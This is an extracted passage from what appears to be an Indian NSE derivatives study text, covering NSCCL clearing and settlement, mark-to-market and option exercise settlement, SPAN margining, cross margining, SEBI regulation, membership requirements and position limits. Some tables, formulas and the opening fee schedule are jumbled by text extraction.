2500 cores More than Rs. 7500 crores up to Rs. 1/. 2009. Per lakh of traded value) Up to First Rs. 7500 crores More than Rs.15000 crores Rs.90 each side Rs. 2500 crores up to Rs. the transaction charges for trades executed on the futures segment is as per the table given below: Total traded value in a month Transaction Charges (Rs. 1. The trading members contribute to Investor Protection Fund of F&O segment at the rate of Re.75 each side However for the transactions in the options sub-segment the transaction charges are levied on the premium value at the rate of 0. 15000 crores Exceeding Rs. Further to this. 1. 100 crores of the traded value (each side).85 each side Rs. 1.ing the transaction charges being levied by it on its trading members.80 each side Rs. 1. 73 .per Rs. With effect from October 1st.05% (each side) instead of on the strike price as levied earlier. trading members have been advised to charge brokerage from their clients on the Premium price (traded price) rather than Strike price.
The open positions of CMs are arrived at by aggregating the open positions of all the TMs and all custodial participants clearing through him. settlement procedure and risk management systems at the NSE for trading of derivatives contracts.1. Some others called trading member-cum-clearing member.CHAPTER 8: Clearing and Settlement National Securities Clearing Corporation Limited (NSCCL) undertakes clearing and settlement of all trades executed on the futures and options (F&O) segment of the NSE. This chapter gives a detailed account of clearing mechanism. 8. For the purpose of settlement all clearing members are required to open a separate bank account with NSCCL designated clearing bank for F&O segment. and the PCMs are required to bring in additional security deposits in respect of every TM whose trades they undertake to clear and settle.1. This position is considered for exposure and daily margin purposes.2 Clearing Mechanism The clearing mechanism essentially involves working out open positions and obligations of clearing (self-clearing/trading-cum-clearing/professional clearing) members. some members.1 Clearing Members In the F&O segment. It also acts as legal counterparty to all trades on the F&O segment and guarantees their financial settlement. called self clearing members. The Clearing and Settlement process comprises of the following three main activities: 1) 2) 3) Clearing Settlement Risk Management 8.2 Clearing Banks Funds settlement takes place through clearing banks. in contracts in which they have traded. Besides.1 Clearing Entities Clearing and settlement activities in the F&O segment are undertaken by NSCCL with the help of the following entities: 8. A TM’s open position is arrived at as the summation of his proprietary open position and clients’ open positions. clear and settle their trades executed by them only either on their own account or on account of their clients. there is a special category of members. in the contracts in which he has 74 . 8. clear and settle their own trades as well as trades of other trading members (TMs). called professional clearing members (PCM) who clear and settle trades executed by TMs. The members clearing their own trades and trades of others.
Sell = 200 . i.4. On Day 2. Client A’s open position at the end of day 1 is 200 long (table 8. Hence the net open position for Client A at the end of day 2 is 400 long.3).400 = 200 short. where 200 is his proprietary open position on net basis plus 600 which is the client open positions on gross basis. Table 8. Therefore the net open position for the trading member at the end of day 2 is sum of the proprietary open position and client open positions. The open position for client A = Buy (O) – Sell (C) = 400 . Now the total open position of the trading member Madanbhai at end of day 1 is 800. While entering orders on the trading system. client open long position and client open short position (as shown in the example below). 1000. i. Similarly.sell) for each contract.1 to Table 8. Clients’ positions are arrived at by summing together net (buy . A TM’s open position is the sum of proprietary open position. Note: A buy position ‘200@ 1000"means 200 units bought at the rate of Rs.e. The table shows his proprietary position. the proprietary position of trading member for trades executed on that day is 200 (buy) – 400 (sell) = 200 short (see table 8.200 = 200 long. The proprietary open position on day 1 is simply = Buy .4). TMs are required to identify the orders. Proprietary positions are calculated on net basis (buy . Consider the following example given from Table 8.e.e. Client B’s open position at the end of day 1 is 400 short (table 8.200 = 400 short.e. The end of day open position for trades done by Client B on day 2 is 200 short (table 8. he has a long position of 200 units.traded. It works out to be 400 + 400 + 600.2). The proprietary open position at end of day 1 is 200 short. i. 1400. Hence the net open position for Client B at the end of day 2 is 600 short. The end of day open position for trades done by Client A on day 2 is 200 long (table 8.4). he has a short position of 400 units. The open position for Client B = Sell (O) – Buy (C) = 600 . We assume here that the position on day 1 is carried forward to the next trading day i. Trading member Madanbhai Proprietary position Buy 200@1000 Sell 400@1010 75 .2). Hence the net open proprietary position at the end of day 2 is 400 short. Day 2. These orders can be proprietary (if they are their own trades) or client (if entered on behalf of clients) through ‘Pro/ Cli’ indicator provided in the order entry screen.1: Proprietary position of trading member Madanbhai on Day 1 Trading member Madanbhai trades in the futures and options segment for himself and two of his clients.sell) positions of each individual client.
Trading member Madanbhai Buy Proprietary position 200@1000 Sell 400@1010 . Trading member Madanbhai Client position Client A Client B Buy Open 400@1109 Sell Close 200@1000 600@1100 200@1099 Sell Open Buy Close Table 8. Table 8.3: Proprietary position of trading member Madanbhai on Day 2 Assume that the position on Day 1 is carried forward to the next trading day and the following trades are also executed.5 illustrates determination of open position of a CM. The table shows his client position. The table shows his client position on Day 2. who clears for two TMs having two clients.4: Client position of trading member Madanbhai on Day 2 Trading member Madanbhai trades in the futures and options segment for himself and two of his clients.
3. and the final settlement which happens on the last trading day of the futures contract. have to be settled in cash. However. The trade price and the day’s settlement price for contracts executed during the day but not squared up. with respect to their obligations on MTM. premium and exercise settlement. The buy price and the sell price for contracts executed during the day and squared up. therefore. The underlying for index futures/options of the Nifty index cannot be delivered. 100 and 77 .8. 8. These contracts. the difference between the buy price and the sell price determines the MTM.6 above gives the MTM on various positions. The settlement price for the contract for today is assumed to be 105. it has been currently mandated that stock options and futures would also be cash settled. through exchange of cash. MTM settlement: All futures contracts for each member are marked-to-market (MTM) to the daily settlement price of the relevant futures contract at the end of each day. i. 200 units are bought @ Rs.500.105. For contracts executed during the day. the MTM shows a profit of Rs. the Mark-to-Market (MTM) settlement which happens on a continuous basis at the end of each day. The settlement amount for a CM is netted across all their TMs/ clients.100 and today’s settlement price of Rs. 2.3.1 Settlement of Futures Contracts Futures contracts have two types of settlements.6 explains the MTM calculation for a member. Table 8. Hence on account of the position brought forward. The profits/losses are computed as the difference between: 1. The MTM on the brought forward contract is the difference between the previous day’s settlement price of Rs. Futures and options on individual securities can be delivered as in the spot market.3 Settlement Procedure All futures and options contracts are cash settled. The previous day’s settlement price and the current day’s settlement price for brought forward contracts. Table 8.e. In this example.
8. So the MTM account shows a profit of Rs. or not traded during the last half hour. after the close of trading hours. is margined at the day’s settlement price and the profit of Rs. the open position of contracts traded during the day. Finally. This is known as daily mark-to-market settlement. NSCCL marks all positions of a CM to the final settlement price and the resulting profit/loss is settled in cash. The pay-in and pay-out of the mark-to-market settlement are effected on the day following the trade day. Such positions become the open positions for the next day.2 Settlement of options contracts Options contracts have two types of settlements.100 units sold @ Rs. The premium payable amount and the premium receivable amount are netted to compute the net premium payable or receivable amount for each client for each option contract. Final settlement for futures: On the expiry day of the futures contracts.200. all the open positions are reset to the daily settlement price. Similarly. on the last trading day of the contract. After completion of daily settlement computation. The CMs who have a loss are required to pay the mark-to-market (MTM) loss amount in cash which is in turn passed on to the CMs who have made a MTM profit. 78 . Final settlement price is the closing price of the relevant underlying index/security in the capital market segment of NSE. Similarly. Daily premium settlement Buyer of an option is obligated to pay the premium towards the options purchased by him. Final settlement loss/profit amount is debited/ credited to the relevant CM’s clearing bank account on the day following expiry day of the contract. 1200.3. a ‘theoretical settlement price’ is computed as per the following formula: F = SerT This formula has been discussed in chapter 3.500 credited to the MTM account. the seller of an option is entitled to receive the premium for the option sold by him. In case a futures contract is not traded on a day. 102 during the day. daily premium settlement and final exercise settlement. TMs are responsible to collect/pay losses/profits from/to their clients by the next day.. CMs are responsible to collect and settle the daily MTM profits/ losses incurred by the TMs and their clients clearing and settling through them. is the difference between the strike price and the final settlement price of the relevant option contract. on a random basis. which may be cleared and settled by their own CM. Final exercise is automatically effected by NSCCL for all open long in-the-money positions in the expiring month option contract. (T = exercise date). on the expiration day of an option contract. on the expiry day of the option contract. On NSE. while for put options it is difference between the strike price and the final settlement price for each unit of the underlying conveyed by the option contract. For call options. All such long positions are exercised and automatically assigned to short positions in option contracts with the same series. The investor who has long in-the-money options on the expiry date will receive the exercise settlement value per unit of the option from the investor who is short on the option. index options and options on securities are European style. To avail of this facility. to execute trades through any TM.e. i. Settlement of exercises of options is currently by payment in cash and not by delivery of securities. the exercise settlement value receivable by a buyer is the difference between the final settlement price and the strike price for each unit of the underlying conveyed by the option contract. Special facility for settlement of institutional deals NSCCL provides a special facility to Institutions/Foreign Institutional Investors (FIIs)/Mutual Funds etc. Exercise process The period during which an option is exercisable depends on the style of the option. a CP is required 79 The exercise settlement value is debited / credited to the relevant CMs clearing bank account on T + 1 day .Final exercise settlement Final exercise settlement is effected for all open long in-the-money strike price options existing at the close of trading hours. The buyer of such options need not give an exercise notice in such cases. Exercise settlement computation In case of option contracts. options are only subject to automatic exercise on the expiration day. The exercise settlement price is the closing price of the underlying (index or security) on the expiry day of the relevant option contract. Such entities are called custodial participants (CPs). all open long positions at in-the-money strike prices are automatically exercised on the expiration day and assigned to short positions in option contracts with the same series on a random basis. Automatic exercise means that all in-the-money options would be exercised by NSCCL on the expiration day of the contract. if they are in-the-money.
Risk containment measures include capital adequacy requirements of members. 4. NSCCL charges an upfront initial margin for all the open positions of a CM. 1. 2. The salient features of risk containment mechanism on the F&O segment are: There are stringent requirements for members in terms of capital adequacy measured in terms of net worth and security deposits. NSCCL’s on-line position monitoring system monitors a CM’s open positions on a realtime basis. Client margins: NSCCL intimates all members of the margin liability of each of their client. Withdrawal of clearing facility of a CM in case of a violation will lead to withdrawal of trading facility 80 . 8. Limits are set for each CM based on his capital deposits. is required to obtain a unique Custodial Participant (CP) code allotted from the NSCCL.to register with NSCCL through his CM. FII/sub-accounts of FIIs which have been allotted a unique CP code by NSCCL are only permitted to trade on the F&O segment. within the time specified by NSE on the trade day though the on-line confirmation facility. 3. The on-line position monitoring system generates alerts whenever a CM reaches a position limit set up by NSCCL. The difference is settled in cash on a T+1 basis. monitoring of member performance and track record.4 Risk Management NSCCL has developed a comprehensive risk containment mechanism for the F&O segment. Till such time the trade is confirmed by CM of concerned CP. At 100% the clearing facility provided to the CM shall be withdrawn. and compliance with the prescribed procedure for settlement and reporting. Such trades executed on behalf of a CP are confirmed by their own CM (and not the CM of the TM through whom the order is entered). the same is considered as a trade of the TM and the responsibility of settlement of such trade vests with CM of the TM. online monitoring of member positions and automatic disablement from trading when limits are breached. stringent margin requirements. which holds in trust client margin monies to the extent reported by the member as having been collected form their respective clients. Once confirmed by CM of concerned CP. intending to trade in the F&O segment of the exchange. position limits based on capital. such CM is responsible for clearing and settlement of deals of such custodial clients. A FII/a sub-account of the FII. FIIs have been permitted to trade subject to compliance of the position limits prescribed for them and their sub-accounts. as the case may be. A unique CP code is allotted to the CP by NSCCL. It specifies the initial margin requirements for each futures/options contract on a daily basis. Additionally members are also required to report details of margins collected from clients to NSCCL. The open positions of the members are marked to market based on contract settlement price for each contract. The CM in turn collects the initial margin from the TMs and their respective clients. All trades executed by a CP through any TM are required to have the CP code in the relevant field on the trading system at the time of order entry.
it stops that particular TM from further trading. The TM is required to collect adequate initial margins up-front from his clients. NSCCL collects initial margin for all the open positions of a CM based on the margins computed by NSE-SPAN.for all TMs and/ or custodial participants clearing and settling through the CM 5. 8.1 NSCCL-SPAN The objective of NSCCL-SPAN is to identify overall risk in a portfolio of all futures and options contracts for each member. Trading facility is withdrawn when the open positions of the trading member exceeds the position limit. This margin is required to be paid by a buyer of an option till the premium settlement is complete. A separate settlement guarantee fund for this segment has been created out of the capital of members. The most critical component of risk containment mechanism for F&O segment is the margining system and on-line position monitoring. 81 . 8. CMs are provided a trading terminal for the purpose of monitoring the open positions of all the TMs clearing and settling through him.. like extremely deep out-of-the-money short positions and inter-month risk. A CM may set exposure limits for a TM clearing and settling through him. The actual position monitoring and margining is carried out on-line through Parallel Risk Management System (PRISM). 6. A member is alerted of his position to enable him to adjust his exposure or bring in additional capital..4.4. 7. premium margin is charged at client level. A CM is required to ensure collection of adequate initial margin from his TMs and his respective clients. These are required to be paid up-front on gross basis at individual client level for client positions and on net basis for proprietary positions. based on the parameters defined by SEBI. • Premium margin: In addition to initial margin. Further trading members are monitored based on positions limits. while at the same time recognizing the unique exposures associated with options portfolios.
its overriding objective is to determine the largest loss that a portfolio might reasonably be expected to suffer from one day to the next day. It then sets the margin requirement at a level sufficient to cover this one-day loss. In standard pricing models.• Assignment margin: Assignment margin is levied in addition to initial margin and premium margin. at 2:00 p. The scenario contract values are updated at least 5 times in the day. 8. It is required to be paid on assigned positions of CMs towards exercise settlement obligations for option contracts. Because SPAN is used to determine performance bond requirements (margin requirements).5 Margining System NSCCL has developed a comprehensive risk containment mechanism for the Futures & Options segment.m. 8. so too will the value of futures and options maintained within a portfolio.m. inter-month risk and inter-commodity risk. The system treats futures and options contracts uniformly. The computation of worst scenario loss has two components. The second is the application of these scenario contract values to the actual positions in a portfolio to compute the portfolio values and the worst scenario loss. SPAN constructs sixteen scenarios of probable changes in underlying prices and volatilities in order to identify the largest loss a portfolio might suffer from one day to the next.1 SPAN approach of computing initial margins The objective of SPAN is to identify overall risk in a portfolio of futures and options contracts for each member. and at the end of the trading session. Underlying market price Volatility (variability) of underlying instrument Time to expiration As these factors change. The most critical component of a risk containment mechanism is the online position monitoring and margining system... The actual margining and position monitoring is done online. The risk of each trading and clearing member is monitored on a real-time basis and alerts/disablement messages are generated if the member crosses the set limits.m. three factors most directly affect the value of an option at a given point in time: 1. while at the same time recognizing the unique exposures associated with options portfolios like extremely deep out-of-the-money short positions. which may be carried out by taking prices at the start of trading.5. 82 . till such obligations are fulfilled. at 12:30 p. 3. The margin is charged on the net exercise settlement value payable by a CM. at 11:00 a. 2. on an intra-day basis using PRISM (Parallel Risk Management System) which is the realtime position monitoring and risk management system.. The first is the valuation of each contract under sixteen scenarios.
and re-value the same under various scenarios of changing market conditions. SPAN further uses a standardized definition of the risk scenarios. are called the risk scenarios. 83 . an option on NIFTY index at a specific strike price) will gain or lose value. Members can apply the data contained in the risk parameter files. Risk array values are represented in Indian Rupees. for a specific set of market conditions which may occur over this time duration. +1 refers to increase in volatility and -1 refers to decrease in volatility. The results of the calculation for each risk scenario i. losses are represented as positive values. constitutes the risk array for that contract. and other necessary data inputs for margin calculation are then provided to members on a daily basis in a file called the SPAN Risk Parameter file.g. In the risk array. SPAN has the ability to estimate risk for combined futures and options portfolios.is called the risk array value for that scenario. Risk scenarios The specific set of market conditions evaluated by SPAN. Risk arrays. and these are defined in terms of: 1. and gains as negative values. 2.7 gives the sixteen risk scenarios. to their specific portfolios of futures and options contracts. Risk arrays The SPAN risk array represents how a specific derivative instrument (for example. the amount by which the futures and options contracts will gain or lose value over the look-ahead time under that risk scenario .2 Mechanics of SPAN The results of complex calculations (e. The underlying price scan range or probable price change over a one day period. and The underlying price volatility scan range or probable volatility change of the underlying over a one day period.e.8. defined in terms of: 1. to determine their SPAN margin requirements. the pricing of options) in SPAN are called risk arrays. How much the price of the underlying instrument is expected to change over one trading day. Table 8. and 2.5. How much the volatility of that underlying price is expected to change over one trading day. from the current point in time to a specific point in time in the near future. The set of risk array values for each futures and options contract under the full set of risk scenarios. the currency in which the futures or options contract is denominated.
in order to determine value gains and losses at the portfolio level. whereis λ a parameter which determines how rapidly volatility estimates change. and the return rt observed in the futures market on day t. This is the single most important calculation executed by the system. The estimate at the end of day t. A value of 0. σt is estimated using the previous day’s volatility estimate σt-1 (as at the end of day t-1). 84 .94 is used for λ SPAN uses the risk arrays to scan probable underlying market price changes and probable volatility changes for all contracts in a portfolio.Table 8.
85 . Number 15 and 16. for a contract month. the program also scans up and down a range of probable volatility from the underlying market’s current volatility (volatility scan range). Deep-out-of-the-money short options positions pose a special risk identification problem. two of the standard risk scenarios in the risk array. However. For each futures and options contract. the July contract would make a loss while the August contract would make a profit. In order to account for this possibility. unusually large underlying price changes may cause these options to move into-the-money. it assumes that price moves correlate perfectly across contract months. SPAN calculates the probable premium value at each price scan point for volatility up and volatility down scenario. Calendar spreads attract lower margins because they are not exposed to market risk of the underlying. For each spread formed. SPAN starts at the last underlying market settlement price and scans up and down three even intervals of price changes (price scan range). SPAN adds an calendar spread charge (also called the inter-month spread charge) to the scanning risk charge associated with each futures and options contract. It then compares this probable premium value to the theoretical premium value (based on last closing value of the underlying) to determine profit or loss. SPAN assesses a specific charge per spread which constitutes the calendar spread charge. However. SPAN identifies the delta associated each futures and option position. This “largest reasonable loss” is the scanning risk charge for the portfolio. After SPAN has scanned the 16 different scenarios of underlying market price and volatility changes. because price changes of these magnitudes are rare.Scanning risk charge As shown in the table giving the sixteen standard risk scenarios. a short position in a July futures contract on Reliance and a long position in the August futures contract on Reliance is a calendar spread. As they move towards expiration. currently defined as double the maximum price scan range for a given underlying. It then forms spreads using these deltas across contract months. the calendar spread charge covers the calendar basis risk that may exist for portfolios containing futures and options with different expirations. thus creating large losses to the holders of short option positions. reflect an “extreme” underlying price movement. Since price moves across contract months do not generally exhibit perfect correlation. it selects the largest loss from among these 16 observations. the system only covers 35% of the resulting losses. they may not be significantly exposed to “normal” price moves in the underlying. If the underlying rises. At each price scan point. Calendar spread margin A calendar spread is a position in an underlying with one maturity which is hedged by an offsetting position in the same underlying with a different maturity: for example. To put it in a different way. As SPAN scans futures prices within a single underlying instrument.
The margin for calendar spread is calculated on the basis of delta of the portfolio in each month.5% of the notional value based on the previous days closing value of the underlying stock. which is set by the NSCCL.. these options may move into-the-money. 1. thereby generating large losses for the short positions in these options.000. Net option value The net option value is calculated as the current market value of the option times the number of option units (positive for long options and negative for short options) in the portfolio. Thus mark to market gains and losses on option positions get adjusted against the available liquid net worth. in the event that underlying market conditions change sufficiently. Short option minimum margin Short options positions in extremely deep-out-of-the-money strikes may appear to have little or no risk across the entire scanning range. For example. To cover the risks associated with deepout-of-the-money short options positions. However. The short option minimum margin equal to 3% of the notional value of all short index options is charged if sum of the worst scenario loss and the calendar spread margin is lower than the short option minimum margin. For stock options it is equal to 7. 86 . Notional value of option positions is calculated on the short option positions by applying the last closing price of the relevant underlying. This means that the current market value of short options are deducted from the liquid net worth and the market value of long options are added thereto. Net option value is added to the liquid net worth of the clearing member.5% per month of spread on the far month contract of the spread subject to a minimum margin of 1% and a maximum margin of 3% on the far month contract of the spread.50 per short position. SPAN assesses a minimum margin for each short option position in the portfolio called the short option minimum charge. suppose that the short option minimum charge is Rs. even if the scanning risk charge plus the calendar spread charge on the position is only Rs. A portfolio containing 20 short options will have a margin requirement of at least Rs. A calendar spread position on Exchange traded equity derivatives may be granted calendar spread treatment till the expiry of the near month contract. Margin on calendar spreads is levied at 0. 500. The short option minimum charge serves as a minimum charge towards margin requirements for each short position in an option contract.
8. 3. This would be applicable only for trades done on a given day. 3. The position in a security is considered only once for providing cross margining benefit. 4. E.3 Overall portfolio margin requirement The total margin requirements for a member for a portfolio of futures and options contract would be computed by SPAN as follows: 1. Compares this figure to the short option minimum charge and selects the larger of the two. The net buy premium margin shall be released towards the Liquid Networth of the member on T+1 day after the completion of pay-in towards premium settlement. 8. Total SPAN margin requirement is equal to SPAN risk requirement less the net option value.g. 5. which is mark to market value of difference in long option positions and short option positions.Net buy premium To cover the one day risk on long option positions (for which premium shall be payable on T+1 day). Adds up the scanning risk charges and the calendar spread charges. Positions in Stock Futures of security A used to set-off against index futures positions is not considered again if there is a off-setting positions in the security A in Cash segment. The spread margins shall be 25% of the applicable upfront margins on the offsetting positions. This is the SPAN risk requirement. 87 .4 Cross Margining Cross margining benefit is provided for off-setting positions at an individual client level in equity and equity derivatives segment. 2. 1. Positions in option contracts are not considered for cross margining benefit. net buy premium to the extent of the net long options position value is deducted from the Liquid Networth of the member on a real time basis.. The cross margin benefit is provided on following offsetting positionsa. c. the basket of constituent stock futures/ stock positions needs to be a complete replica of the index futures. The positions in F&O segment for stock futures and index futures of the same expiry month are eligible for cross margining benefit. b. The positions which are eligible for offset are subjected to spread margins.5. Initial margin requirement = Total SPAN margin requirement + Net Buy Premium.5. 4.
140. Cross margining mechanism reduces the margin for Mr. 60. 240 to only Rs. 88 .240. despite being traded on the common underlying securities in both the segments. X is Rs. X in the capital market segment is significantly mitigated by the corresponding off-setting position in the F&O segment. If the margins payable in the capital market segment is Rs. For example..100 and in the F&O segment is Rs. the total margin payable by MR. Mr. X from Rs.Prior to the implementation of a cross margining mechanism positions in the equity and equity derivatives segment were been treated separately.
• Security receipt as defined in clause (zg) of section 2 of the Securitisation and Reconstruction of Financial Assets and Enforcement of Security Interest Act. loan whether secured or unsecured. issued to an investor by an issuer being a special purpose distinct entity which possesses any debt or receivable. 2004. • • Derivative. The original act was introduced in 1956. It now governs the trading of securities in India. 2002 • • Units or any other such instrument issued to the investor under any mutual fund scheme1. It was subsequently amended in 1996. Rights or interests in securities. 2007 and 2010. 1938 (4 of 1938) 89 . risk instrument or contract for differences or any other form of security. and acknowledging beneficial interest of such investor in such debt or receivable. 9. by whatever name called. stocks. the rules and regulations framed under that and the rules and bye–laws of the stock exchanges. share. This Chapter takes a look at the legal and regulatory framework for derivatives trading in India. 1999. Units or any other instrument issued by any collective investment scheme to the investors in such schemes. assigned to such entity. • • • Government securities Such other instruments as may be declared by the Central Government to be securities. Any certificate or instrument (by whatever name called). The term “securities” has been defined in the amended SC(R)A under the Section 2(h) to include: • Shares. “Derivative” is defined to include: • A security derived from a debt instrument. scrips. discusses in detail the recommendation of the LC Gupta Committee for trading of derivatives in India. or index of prices. 1 Securities shall not include any unit linked insurance policy or scrips or any such instrument or unit. • A contract which derives its value from the prices. which provides a combined benefit risk on the life of the persons and investments by such persons and issued by an insurer referred to in clause (9) of section 2 of the insurance Act. 1956 SC(R)A regulates transactions in securities markets along with derivatives markets. debentures. the SEBI Act. debenture stock or other marketable securities of a like nature in or of any incorporated company or other body corporate.1 Securities Contracts (Regulation) Act. It also. including mortgage debt. including mortgage debt as the case may be. of underlying securities.CHAPTER 9: Regulatory Framework The trading of derivatives is governed by the provisions contained in the SC(R)A. bonds.
undertaking inspection. On May 11. calling for information from. The exchange would have to regulate the sales practices of 90 . 9. mutual funds and other persons associated with the securities market and other intermediaries and self–regulatory organizations in the securities market. In particular. 1992 SEBI Act. According to this framework: • Any Exchange fulfilling the eligibility criteria can apply to SEBI for grant of recognition under Section 4 of the SC(R)A.3 Regulation for Derivatives Trading SEBI set up a 24-member committee under the Chairmanship of Dr. L. SEBI has been obligated to perform the aforesaid functions by such measures as it thinks fit. Its regulatory jurisdiction extends over corporates in the issuance of capital and transfer of securities. 1998 SEBI accepted the recommendations of the committee and approved the phased introduction of derivatives trading in India beginning with stock index futures. Gupta to develop the appropriate regulatory framework for derivatives trading in India. 9. as may be delegated to it by the Central Government. registering and regulating the working of stock brokers. contracts in derivative shall be legal and valid if such contracts are: • • Traded on a recognized stock exchange Settled on the clearing house of the recognized stock exchange. in accordance with the rules and bye–laws of such stock exchanges.2 Securities and Exchange Board of India Act. prohibiting fraudulent and unfair trade practices relating to securities markets. C. 1956 to start trading derivatives. it has powers for: • • • • • regulating the business in stock exchanges and any other securities markets.Section 18A of the SC(R)A provides that notwithstanding anything contained in any other law for the time being in force. 1992 provides for establishment of Securities and Exchange Board of India (SEBI) with statutory powers for (a) protecting the interests of investors in securities (b) promoting the development of the securities market and (c) regulating the securities market. sub–brokers etc. • performing such functions and exercising according to Securities Contracts (Regulation) Act. conducting inquiries and audits of the stock exchanges. 1956. promoting and regulating self-regulatory organizations. in addition to all intermediaries and persons associated with securities market. The derivatives exchange/segment should have a separate governing council and representation of trading/clearing members shall be limited to maximum of 40% of the total members of the governing council.
2 Lakh. The minimum networth for clearing members of the derivatives clearing corporation/ house shall be Rs. • Derivative brokers/dealers and clearing members are required to seek registration from SEBI. The networth of the member shall be computed as follows: • • Capital + Free reserves Less non-allowable assets viz. • The Exchange should have minimum 50 members. • The clearing and settlement of derivatives trades would be through a SEBI approved clearing corporation/house. exposure limits linked to capital adequacy and margin demands related to the risk of loss on the position will be prescribed by SEBI/Exchange from time to time.its members and would have to obtain prior approval of SEBI before start of trading in any derivative contract. Exchanges have to submit details of the futures contract they propose to introduce. The members seeking admission in the derivative segment of the exchange would need to fulfill the eligibility conditions.300 Lakh.. • The initial margin requirement. 91 .
Requirements for professional clearing membership are provided in table 9.2. Lakh) Net worth1 CM and F&O segment 100 (Membership in CM segment and Trading/Trading in F&O segment) CM. 9.1: Eligibility criteria for membership on F&O segment (corporates) Particulars (all values in Rs. A trading member can also be a clearing member by meeting additional requirements. fixed deposit receipts. T-bills and dated government securities. 9. An existing member of CM segment can also take membership of F&O segment. Anybody interested in taking membership of F&O segment is required to take membership of “CM and F&O segment” or “CM. WDM and F&O segment”. CM segment and Trading and clearing membership in F&O segment) and self-clearing membership and trading/trading and 92 ..2 Requirements to become F&O segment member The eligibility criteria for membership on the F&O segment is as given in table 9. bank guarantee. WDM and F&O segment 200 (Membership in WDM segment.1 Forms of collateral’s acceptable at NSCCL Members and authorized dealers have to fulfill certain requirements and provide collateral deposits to become members of the F&O segment.3.• The trading members are required to have qualified approved user and sales person who should have passed a certification programme approved by SEBI.3. All collateral deposits are segregated into cash component and non-cash component. There can also be only clearing members. Table 9.1. Non-cash component mean all other forms of collateral deposits like deposit of approved demat securities. Cash component means cash.
8 lakh per trading member he undertakes to clear in the F&O segment. However. 2 lakh and CSD of Rs. authorized persons and approved users to operate the trading workstation(s). These authorized users can be individuals. 300 Lakh is required for TM-CM and PCM.3 Requirements to become authorized / approved user Trading members and participants are allowed to appoint. Authorized persons cannot collect any commission or any amount directly from the clients he introduces to the trading member who appointed him. The approved user can access the NEAT system 93 . ** Additional Collateral Security Deposit (CSD) of 25 lakhs with NSCCL is required for Trading and Clearing (TM-CM) and for Trading and Self clearing member (TM/SCM). Each approved user is given a unique identification number through which he will have access to the NEAT system. Approved users on the F&O segment have to pass a certification program which has been approved by SEBI. 25 lakh respectively for corporate Members) per trading member in the CM segment. with the approval of the F&O segment of the exchange. registered partnership firms or corporate bodies as defined under the Companies Act. lakh) Particulars Eligibility Net Worth Interest Free Security Deposit (IFSD)* Collateral Security Deposit (CSD) Annual Subscription 25 2. * Additional IFSD of 25 lakhs with NSCCL is required for Trading and Clearing (TM-CM) and for Trading and Self clearing member (TM/SCM). 9. 2 lakh and CSD of Rs. Table 9. 1956. However he can receive a commission or any such amount from the trading member who appointed him as provided under regulation. a networth of Rs. 17. 8 lakh per trading member whose trades he undertakes to clear in the F&O segment and IFSD of Rs.3. 6 lakh and CSD of Rs.1: 1 No additional networth is required for self clearing members. In addition. a member clearing for others is required to bring in IFSD of Rs. 9 lakh and Rs.5 25 Nil 25 25 CM Segment F&O Segment Trading Member of NSE/SEBI Registered Custodians/Recognised Banks 300 300 *The Professional Clearing Member (PCM) is required to bring in IFSD of Rs.2: Requirements for Professional Clearing Membership (Amount in Rs.5 lakh (Rs.Notes for Table 9.
market and FII levels respectively. should not exceed 1% of the free float market capitalization (in terms of number of shares) or 5% of the open interest in all derivative contracts in the same underlying stock (in terms of number of shares) whichever is higher.e. Trading member position limits Trading member position limits are specified as given below: 1. The Clearing Corporation shall specify the trading member-wise position limits on the last trading day month which shall be reckoned for the purpose during the next month.4 Position limits Position limits have been specified by SEBI at trading member. of 94 . Client level position limits The gross open position for each client.50 crore which ever is lower.150 crores. the combined futures and options position limit is 20% of applicable MWPL or Rs.3. the combined futures and options position limit is 20% of applicable MWPL and futures position cannot exceed 20% of applicable MWPL or Rs. 2.300 crores. client. across all the derivative contracts on an underlying. Trading member position limits in equity index futures contracts: The trading member position limits in equity index futures contracts is higher of Rs. whichever is lower. • For stocks having applicable market-wise position limit (MWPL) less than Rs. 20% of the free–float in terms of no.500 crores or more. Trading member position limits in equity index option contracts: The trading member position limits in equity index option contracts is higher of Rs. This limit is applicable on open positions in all futures contracts on a particular underlying index. Trading member position limits for combined futures and options position: • For stocks having applicable market-wise position limit (MWPL) of Rs.500 crore or 15% of the total open interest in the market in equity index futures contracts.500 crores. Market wide position limits The market wide limit of open position (in terms of the number of underlying stock) on futures and option contracts on a particular underlying stock is 20% of the number of shares held by non-promoters in the relevant underlying security i. whichever is lower and within which stock futures position cannot exceed 10% of applicable MWPL or Rs.through a password and can change such password from time to time. 9. This limit is applicable on open positions in all option contracts on a particular underlying index. 3.500 crore or 15% of the total open interest in the market in equity index option contracts.
• At the end of each day during which the ban on fresh positions is in force for any scrip. In addition to the above. the exchange also checks on a monthly basis. If so. 2. The enforcement of the market wide limits is done in the following manner: • At end of the day the exchange tests whether the market wide open interest for any scrip exceeds 95% of the market wide position limit for that scrip. the exchange takes note of open position of all client/TMs as at end of that day for that scrip and from next day onwards they can trade only to decrease their positions through offsetting positions. The penalty is recovered before trading begins next day. In case it does so. This limit is applicable on open positions in all option contracts on a particular underlying index. Further. short calls and long puts) not exceeding (in notional value) the FIIs/MF’s holding of stocks. the exchange tests whether any member or client has increased his existing positions or has created a new position in that scrip. If so. then the exchange phases out derivative contracts on that underlying. b. that client is subject to a penalty equal to a specified percentage (or basis points) of the increase in the position (in terms of notional value). Short positions in index derivatives (short futures. per exchange. FII and MF position limits in all index futures contracts on a particular underlying index is the same as mentioned above for FII and MF position limits in index option contracts. The FII and MF position limits in all index options contracts on a particular underlying index are Rs. long calls and short puts) not 95 . • The normal trading in the scrip is resumed after the open outstanding position comes down to 80% or below of the market wide position limit. This limit is applicable on open positions in all futures contracts on a particular underlying index. FIIs and MF’s can take exposure in equity index derivatives subject to the following limits: a. This limit is applicable on all open positions in all futures and option contracts on a particular underlying stock. 500 crores or 15% of the total open interest of the market in index options. whichever is higher. which is set high enough to deter violations of the ban on increasing positions.shares of a company. Long positions in index derivatives (long futures. The exchange specifies the percentage or basis points. whether a stock has remained subject to the ban on new position for a significant part of the month consistently for three months. FII / MFs position limits FII and MFs position limits are specified as given below: 1.
